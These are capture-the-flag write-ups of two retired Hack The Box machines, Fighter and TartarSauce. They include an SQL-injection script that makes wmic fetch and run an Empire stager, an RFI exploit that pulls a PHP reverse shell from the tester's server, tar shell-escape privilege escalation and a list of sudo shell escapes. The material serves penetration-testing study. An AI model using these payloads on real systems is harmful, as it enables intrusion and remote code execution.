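    return xor_bytes(candidate.encode("ascii"), key) == obfuscated.encode("ascii")


def brute_force_key(obfuscated: str) -> List[Tuple[int, str]]:
    """If the key were not visible in the disassembly: try all 256 one-byte keys
    and keep those that decode to printable ASCII. The real key stands out as
    the one that yields a word-like string, which is why a single-byte XOR
    offers no protection worth the name."""
    out = []
    for k in range(256):
        plain = xor_bytes(obfuscated.encode("ascii"), k)
        if all(0x20 <= b < 0x7F for b in plain):
            out.append((k, plain.decode("ascii")))
    return out


if __name__ == "__main__":
    print(recover_password())                      # OdioLaFeta
    print(check_password("OdioLaFeta"))            # True
    for key, candidate in brute_force_key(OBFUSCATED):
        print(f"key {key:3d}: {candidate}")
```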

Alternative: with Empire

The Defender bypass by Luis Vacas uses Empire's starfighter_xsl stager. A small Python script sends the same injection, but the command handed to xp_cmdshell is wmic with a remote /format: stylesheet, so wmic.exe (a signed Microsoft binary) fetches our .xsl from the web server and runs the script it contains, which gives us an Empire agent:

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
import requests

# Same stacked-query injection as above; the xp_cmdshell command is wmic with a remote XSL stylesheet (the Squiblytwo technique), which fetches wojo.xsl from our web server and runs the Empire stager it contains, then switches xp_cmdshell off again.
params = {"username": "admin", "password": "admin", "B1": "LogIn",
          "logintype": "1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

# Session cookie copied from the browser; don't follow the redirect so we see the response to the injected request itself
resp = requests.post("http://members.streetfighterclub.htb/old/verify.asp", data=params, allow_redirects=False,
                     cookies={"ASPSESSIONIDCARRRDBA": "IFMBKKKDLPNKELDDENPKDKNB"})
print(resp.status_code)
.
.

To move from the Empire agent to Metasploit we use nps_payload (https://github.com/trustedsec/nps_payload). Example of use from the Empire agent:

cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author: Jacco Straathof

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

HTB – TartarSauce

Today we are going to solve another CTF challenge, "TartarSauce". It is a retired vulnerable lab presented by Hack the Box for helping pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time
Nmap scan report for 10.10.10.88
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds

Let's navigate to port 80 in a web browser. Entering the IP in the URL bar brings up the landing page shown below.

The landing page itself has nothing of interest, so we run dirb to enumerate directories and find /webservices/ (robots.txt in the nmap output already points at paths beneath it). That directory is empty in turn, so we enumerate below it.

Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.

We run wpscan to enumerate themes and plugins and find the Gwolle Guestbook plugin installed. Searching for exploits shows it is vulnerable to Remote File Inclusion (RFI), CVE-2015-8351; the advisory follows.

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

We follow the PoC given in the exploit-db entry and use the php-reverse-shell.php that ships with Kali (/usr/share/webshells/php/), set our IP and port in it, and rename it wp-load.php, since the vulnerable code appends that file name to whatever abspath points at. We host it with Python's HTTP server and trigger the include with curl. Note that this only works because the target's PHP permits URL includes; with allow_url_include off, require() refuses remote URLs.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/

We set up a netcat listener and, as soon as the PHP shell is included through the RFI, we get a reverse shell as www-data. In /home there is a directory onuma that www-data cannot read. We spawn a TTY with python3 and run sudo -l: www-data can run tar as user onuma without a password. tar has options that execute arbitrary commands, so this gives us a shell as onuma.

We take advantage of tar's checkpoint feature. --checkpoint=N makes tar perform a progress action every N records (a record is 10 KiB by default), and --checkpoint-action lets us choose what that action is. The default is to print a status message, but exec= runs a program instead. With --checkpoint=1 the action fires at the first record, so tar hands us a shell straight away:

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
onuma@TartarSauce:/$ ls
ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz
onuma@TartarSauce:/$ cat /home/onuma/user.txt
cat /home/onuma/user.txt
b2d*****2c7
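The sudo -l result is the real finding here: tar is one of many binaries that will run an arbitrary command once you may execute it, so a NOPASSWD rule on it is equivalent to granting a shell as the runas user. The following Python is an added example, not from the write-up: it parses sudoers-style rules and flags those that grant ALL or a binary with a known shell escape (the tar checkpoint trick used above, find -exec, vim's :!, and a few others). The sudoers text is constructed to mirror what sudo -l showed on the box; real files also use aliases, negations and continuation lines, which this small parser does not handle.

```python
import os
import re
from typing import Dict, List

# Added example, not from the write-up: audit sudoers rules for the pattern
# abused here, a rule that lets a user run a binary with a known shell escape
# as another user (tar's --checkpoint-action is one of many such escapes).

# Binary -> how it hands out a shell or runs a command once you may execute it.
SHELL_ESCAPES = {
    "tar": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
    "find": "find . -exec /bin/sh \\; -quit",
    "vim": ":!/bin/sh",
    "less": "!/bin/sh",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
    "perl": "perl -e 'exec \"/bin/sh\";'",
    "python3": "python3 -c 'import os; os.system(\"/bin/sh\")'",
    "env": "env /bin/sh",
}

# user_or_%group  host = (runas[:group]) [TAG:] cmd[, cmd...]
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAGS = re.compile(r"^((?:[A-Z_]+:\s*)*)(.*)$")


def parse_sudoers(text: str) -> List[Dict]:
    """Parse user specifications into one record per command.

    Handles the common form only: Defaults, aliases, negations and
    continuation lines are out of scope for this example.
    """
    rules: List[Dict] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        nopasswd = False  # a tag stays in force for the commands that follow it
        for part in m.group("cmds").split(","):
            tags, command = TAGS.match(part.strip()).groups()
            if "NOPASSWD:" in tags:
                nopasswd = True
            elif "PASSWD:" in tags:
                nopasswd = False
            rules.append({"who": m.group("who"), "runas": runas,
                          "nopasswd": nopasswd, "command": command})
    return rules


def audit(rules: List[Dict]) -> List[Dict]:
    """Flag rules granting ALL or a binary with a known shell escape."""
    findings = []
    for r in rules:
        if not r["command"]:
            continue
        binary = os.path.basename(r["command"].split()[0])
        if r["command"] == "ALL":
            findings.append({**r, "binary": "ALL", "escape": "any command"})
        elif binary in SHELL_ESCAPES:
            findings.append({**r, "binary": binary, "escape": SHELL_ESCAPES[binary]})
    return findings


# Constructed sample, modelled on what sudo -l reported on the box.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
www-data ALL=(onuma) NOPASSWD: /bin/tar          # the TartarSauce rule
deploy  ALL=(root) /usr/bin/systemctl restart nginx, NOPASSWD: /usr/bin/find
%admin  ALL=(ALL) ALL
"""


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        pw = "without a password" if f["nopasswd"] else "with a password"
        print(f"{f['who']} can run {f['binary']} as {f['runas']} {pw}: {f['escape']}")
```

Restricting the rule to a fixed argument list (for example /bin/tar -czf /backup/site.tgz /var/www/html) would close this particular hole, because sudo then rejects any other arguments, including --checkpoint-action.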

We use pspy to watch processes. Letting pspy32 run for a while shows a script that runs as root every 5 minutes:

2018/05/29 07:56:33 CMD: UID=0    PID=24065  | /bin/bash /usr/sbin/backuperer

Enumerating the system, we find the script backuperer; /usr/local/bin/backup is a symlink to it.

Looking at its contents, the script creates a gzip archive of the files under /var/www/html and then, 30 seconds after creating it, checks the integrity of the archive against the original.

Our exploit script takes advantage of that sleep. Because the archive is only checked 30 seconds after it is written, we have a 30-second window in which to replace it with an archive of our own, and the root process then works on our archive instead of the one it created. We use this script here. After running the script we find the root flag.

Author: Sayantan Bera